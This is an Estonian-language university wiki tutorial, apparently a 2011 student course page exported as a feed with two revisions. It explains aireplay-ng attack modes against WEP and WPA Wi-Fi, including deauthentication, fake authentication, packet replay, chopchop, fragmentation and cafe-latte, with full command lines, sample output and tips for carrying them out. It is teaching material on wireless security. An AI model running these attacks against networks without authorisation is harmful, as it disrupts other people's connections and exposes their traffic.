Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -4 -h CC:CC:CC:CC:CC:CC -b AA:AA:AA:AA:AA:AA ath0&lt;br /&gt;
       Read 165 packets...&lt;br /&gt;
&lt;br /&gt;
         Size: 86, FromDS: 1, ToDS: 0 (WEP)&lt;br /&gt;
 &lt;br /&gt;
         BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
         Dest. MAC  =  FF:FF:FF:FF:FF:FF&lt;br /&gt;
         Source MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
 &lt;br /&gt;
         0x0000:  0842 0000 ffff ffff ffff 0014 6c7e 4080  .B..........l~@.&lt;br /&gt;
         0x0010:  0040 f477 e5c9 603a d600 0000 5fed a222  .@.w..`:...._..&amp;quot;&lt;br /&gt;
         0x0020:  e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543  ...H......._=..C&lt;br /&gt;
         0x0030:  d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873  ....j.....%.[.(s&lt;br /&gt;
         0x0040:  16d4 43fb aebb 3ea1 7101 729e 65ca 6905  ..C...&amp;gt;.q.r.e.i.&lt;br /&gt;
         0x0050:  cfeb 4a72 be46                           ..Jr.F&lt;br /&gt;
&lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
&lt;br /&gt;
 Saving chosen packet in replay_src-0001-123456.cap&lt;br /&gt;
 &lt;br /&gt;
 Offset   85 ( 0% done) | xor = D3 | pt = 95 |  253 frames written in   760ms&lt;br /&gt;
 Offset   84 ( 1% done) | xor = EB | pt = 55 |  166 frames written in   498ms&lt;br /&gt;
 Offset   83 ( 3% done) | xor = 47 | pt = 35 |  215 frames written in   645ms&lt;br /&gt;
 Offset   82 ( 5% done) | xor = 07 | pt = 4D |  161 frames written in   483ms&lt;br /&gt;
 Offset   81 ( 7% done) | xor = EB | pt = 00 |   12 frames written in    36ms&lt;br /&gt;
 ...&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0001-123457.cap&lt;br /&gt;
 Saving keystream in replay_dec-0001-123456.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugemiseks paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -5 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
Waiting for a data packet...&lt;br /&gt;
Read 96 packets...&lt;br /&gt;
&lt;br /&gt;
      Size: 120, FromDS: 1, ToDS: 0 (WEP)&lt;br /&gt;
&lt;br /&gt;
           BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
       Dest. MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
      Source MAC  =  BB:BB:BB:BB:BB:BB&lt;br /&gt;
&lt;br /&gt;
      0x0000:  0842 0201 000f b5ab cb9d 0014 6c7e 4080  .B..........l~@.&lt;br /&gt;
      0x0010:  00d0 cf03 348c e0d2 4001 0000 2b62 7a01  ....4...@...+bz.&lt;br /&gt;
      0x0020:  6d6d b1e0 92a8 039b ca6f cecb 5364 6e16  mm.......o..Sdn.&lt;br /&gt;
      0x0030:  a21d 2a70 49cf eef8 f9b9 279c 9020 30c4  ..*pI.....&#039;.. 0.&lt;br /&gt;
      0x0040:  7013 f7f3 5953 1234 5727 146c eeaa a594  p...YS.4W&#039;.l....&lt;br /&gt;
      0x0050:  fd55 66a2 030f 472d 2682 3957 8429 9ca5  .Uf...G-&amp;amp;.9W.)..&lt;br /&gt;
      0x0060:  517f 1544 bd82 ad77 fe9a cd99 a43c 52a1  Q.D...w.....&amp;lt;R.&lt;br /&gt;
      0x0070:  0505 933f af2f 740e                      ...?./t.&lt;br /&gt;
&lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
Saving chosen packet in replay_src-0001-123456.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0001-123456.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab &#039;&#039;custom&#039;&#039; pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -6 -h CC:CC:CC:CC:CC:CC -b AA:AA:AA:AA:AA:AA -D mon0&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
===ARP===&lt;br /&gt;
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
===IP===&lt;br /&gt;
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks &#039;&#039;bit flippingut&#039;&#039;. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC&#039;i muutmiseks juhul kui seal on algselt &#039;&#039;multicast&#039;&#039;.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
[[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32797</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32797"/>
		<updated>2011-05-24T19:23:12Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Rünnak 5: Fragmentation attack */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Autor=&lt;br /&gt;
Tanel Liiv D22 (2011)&lt;br /&gt;
&lt;br /&gt;
=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:36:02  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]&lt;br /&gt;
21:36:05  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA  mon0&lt;br /&gt;
21:33:25  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
21:33:25  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:28  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:40:20  Sending Authentication Request&lt;br /&gt;
21:40:20  Authentication successful&lt;br /&gt;
21:40:20  Sending Association Request&lt;br /&gt;
21:40:20  Association successful :-)&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;...&lt;br /&gt;
15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -d FF:FF:FF:FF:FF:FF -t 1 mon0&lt;br /&gt;
 Read 4 packets...&lt;br /&gt;
 &lt;br /&gt;
      Size: 68, FromDS: 0, ToDS: 1 (WEP)&lt;br /&gt;
 &lt;br /&gt;
           BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
       Dest. MAC  =  FF:FF:FF:FF:FF:FF&lt;br /&gt;
      Source MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
 &lt;br /&gt;
      0x0000:  0841 de00 0014 6c7e 4080 000f b534 3030  .A....l~@....400&lt;br /&gt;
      0x0010:  ffff ffff ffff 4045 d16a c800 6f4f ddef  ......@E.j..oO..&lt;br /&gt;
      0x0020:  b488 ad7c 9f2a 64f6 ab04 d363 0efe 4162  ...|.*d....c..Ab&lt;br /&gt;
      0x0030:  8ad9 2f74 16bb abcf 232e 97ee 5e45 754d  ../t....#...^EuM&lt;br /&gt;
      0x0040:  23e0 883e                                #..&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
